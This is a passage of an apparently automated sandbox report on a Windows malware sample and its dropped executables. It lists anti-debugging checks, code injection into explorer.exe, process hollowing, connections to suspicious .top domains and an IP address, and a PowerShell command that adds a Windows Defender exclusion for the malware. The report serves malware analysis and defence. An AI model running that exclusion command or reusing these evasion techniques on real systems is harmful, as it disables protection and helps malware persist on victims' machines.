Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h] 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h] 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h] 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h] 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h] 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h] 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944710 mov eax, dword ptr fs:[00000030h] 22_2_6A944710
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93F716 mov eax, dword ptr fs:[00000030h] 22_2_6A93F716
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9AFF10 mov eax, dword ptr fs:[00000030h] 22_2_6A9AFF10
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9AFF10 mov eax, dword ptr fs:[00000030h] 22_2_6A9AFF10
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916730 mov eax, dword ptr fs:[00000030h] 22_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916730 mov eax, dword ptr fs:[00000030h] 22_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916730 mov eax, dword ptr fs:[00000030h] 22_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94E730 mov eax, dword ptr fs:[00000030h] 22_2_6A94E730
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93B73D mov eax, dword ptr fs:[00000030h] 22_2_6A93B73D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93B73D mov eax, dword ptr fs:[00000030h] 22_2_6A93B73D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914F2E mov eax, dword ptr fs:[00000030h] 22_2_6A914F2E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914F2E mov eax, dword ptr fs:[00000030h] 22_2_6A914F2E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 22_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 22_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 22_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 22_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 22_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91A745 mov eax, dword ptr fs:[00000030h] 22_2_6A91A745
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94DF4C mov eax, dword ptr fs:[00000030h] 22_2_6A94DF4C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h] 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916F60 mov eax, dword ptr fs:[00000030h] 22_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916F60 mov eax, dword ptr fs:[00000030h] 22_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93E760 mov eax, dword ptr fs:[00000030h] 22_2_6A93E760
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93E760 mov eax, dword ptr fs:[00000030h] 22_2_6A93E760
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8F6A mov eax, dword ptr fs:[00000030h] 22_2_6A9E8F6A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91649B mov eax, dword ptr fs:[00000030h] 22_2_6A91649B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91649B mov eax, dword ptr fs:[00000030h] 22_2_6A91649B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A911480 mov eax, dword ptr fs:[00000030h] 22_2_6A911480
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914CB0 mov eax, dword ptr fs:[00000030h] 22_2_6A914CB0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E9CB3 mov eax, dword ptr fs:[00000030h] 22_2_6A9E9CB3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8CD6 mov eax, dword ptr fs:[00000030h] 22_2_6A9E8CD6
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912CDB mov eax, dword ptr fs:[00000030h] 22_2_6A912CDB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D14FB mov eax, dword ptr fs:[00000030h] 22_2_6A9D14FB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8C14 mov eax, dword ptr fs:[00000030h] 22_2_6A9E8C14
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E740D mov eax, dword ptr fs:[00000030h] 22_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E740D mov eax, dword ptr fs:[00000030h] 22_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E740D mov eax, dword ptr fs:[00000030h] 22_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 22_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914439 mov eax, dword ptr fs:[00000030h] 22_2_6A914439
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94BC2C mov eax, dword ptr fs:[00000030h] 22_2_6A94BC2C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8450 mov eax, dword ptr fs:[00000030h] 22_2_6A9E8450
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A955C70 mov eax, dword ptr fs:[00000030h] 22_2_6A955C70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 22_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8C75 mov eax, dword ptr fs:[00000030h] 22_2_6A9E8C75
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93746D mov eax, dword ptr fs:[00000030h] 22_2_6A93746D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A913591 mov eax, dword ptr fs:[00000030h] 22_2_6A913591
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 22_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 22_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 22_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 22_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 22_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 22_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 22_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9435A1 mov eax, dword ptr fs:[00000030h] 22_2_6A9435A1
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CFDD3 mov eax, dword ptr fs:[00000030h] 22_2_6A9CFDD3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9115C1 mov eax, dword ptr fs:[00000030h] 22_2_6A9115C1
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9195F0 mov eax, dword ptr fs:[00000030h] 22_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9195F0 mov ecx, dword ptr fs:[00000030h] 22_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C8DF1 mov eax, dword ptr fs:[00000030h] 22_2_6A9C8DF1
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9495EC mov eax, dword ptr fs:[00000030h] 22_2_6A9495EC
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 22_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 22_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 22_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91F51D mov eax, dword ptr fs:[00000030h] 22_2_6A91F51D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91AD30 mov eax, dword ptr fs:[00000030h] 22_2_6A91AD30
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8D34 mov eax, dword ptr fs:[00000030h] 22_2_6A9E8D34
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944D3B mov eax, dword ptr fs:[00000030h] 22_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944D3B mov eax, dword ptr fs:[00000030h] 22_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944D3B mov eax, dword ptr fs:[00000030h] 22_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h] 22_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h] 22_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h] 22_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h] 22_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h] 22_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A937D50 mov eax, dword ptr fs:[00000030h] 22_2_6A937D50
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C8D47 mov eax, dword ptr fs:[00000030h] 22_2_6A9C8D47
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C3D40 mov eax, dword ptr fs:[00000030h] 22_2_6A9C3D40
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91354C mov eax, dword ptr fs:[00000030h] 22_2_6A91354C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91354C mov eax, dword ptr fs:[00000030h] 22_2_6A91354C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93C577 mov eax, dword ptr fs:[00000030h] 22_2_6A93C577
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93C577 mov eax, dword ptr fs:[00000030h] 22_2_6A93C577
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00416842 mov eax, dword ptr fs:[00000030h] 29_2_00416842
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00412AB1 mov eax, dword ptr fs:[00000030h] 29_2_00412AB1
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 1_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041CC60
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree, 29_2_00401F20
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A946B90 rdtsc 22_2_6A946B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_1_004026C8 LdrLoadDll, 15_1_004026C8
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 1_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041CC60
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 1_2_004203D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_004203D0
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00410E58 SetUnhandledExceptionFilter, 29_2_00410E58
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_004110A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_004110A3
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00415393 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_00415393
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00410CF3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_00410CF3

HIPS / PFW / Operating System Protection Evasion:

barindex
Early bird code injection technique detected
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\DF9C.exe Jump to behavior
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: ffjbuft.4.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Memory written: C:\Users\user\AppData\Local\Temp\6EC5.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Memory written: C:\Users\user\AppData\Local\Temp\DF9C.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 13_2_02C30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 13_2_02C30110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Thread created: C:\Windows\explorer.exe EIP: 2871920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Thread created: unknown EIP: 4EC1920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Thread created: unknown EIP: 85F19C0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Thread created: unknown EIP: 7E21920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Section unmapped: C:\Users\user\AppData\Local\Temp\6EC5.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 41C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 41E000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 48D7008 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\DF9C.exe Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
